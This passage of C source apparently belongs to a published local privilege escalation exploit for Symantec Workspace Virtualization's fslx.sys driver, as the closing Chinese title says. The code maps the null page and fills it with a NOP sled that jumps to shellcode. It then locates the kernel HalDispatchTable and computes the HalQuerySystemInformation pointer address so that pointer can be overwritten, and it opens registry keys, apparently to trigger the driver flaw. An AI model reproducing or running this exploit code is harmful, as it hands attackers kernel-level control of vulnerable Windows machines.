if (status !=0)
{
printf("err alloc vm %08x\n", status);
getchar();
return 0 ;
}
//result length always <=0x800
//0~0x800: NOP
//0x800: shell code
memset((PVOID)0x0 , 0x90 , 0x1000);
*(BYTE*)((ULONG)0x800) = 0xe9 ;
*(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ;
//get haldispatchtable
HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1);
if (hntos == 0 )
{
printf("cannot load ntos\n");
getchar();
return 0 ;
}
PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
FreeLibrary(hntos);
HKEY hkey ;
ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey);
if (err!=ERROR_SUCCESS)
{
printf("open key read failed %u\n" ,err);
getchar();
return 0 ;
}
HKEY hkey2 ;
err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2);
if (err != ERROR_SUCCESS)
{
printf("open key write failed %u\n", err);
getchar();
return 0 ;
}
DWORD dd ;
err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD));
if (err != ERROR_SUCCESS)
{
printf("set value %u\n" , err);
getchar();
return 0 ;
} BYTE buffer[100];
PVOID pbuf = buffer ;
Symantec Workspace Virtualization 'fslx.sys' 本地权限提升漏洞 (4)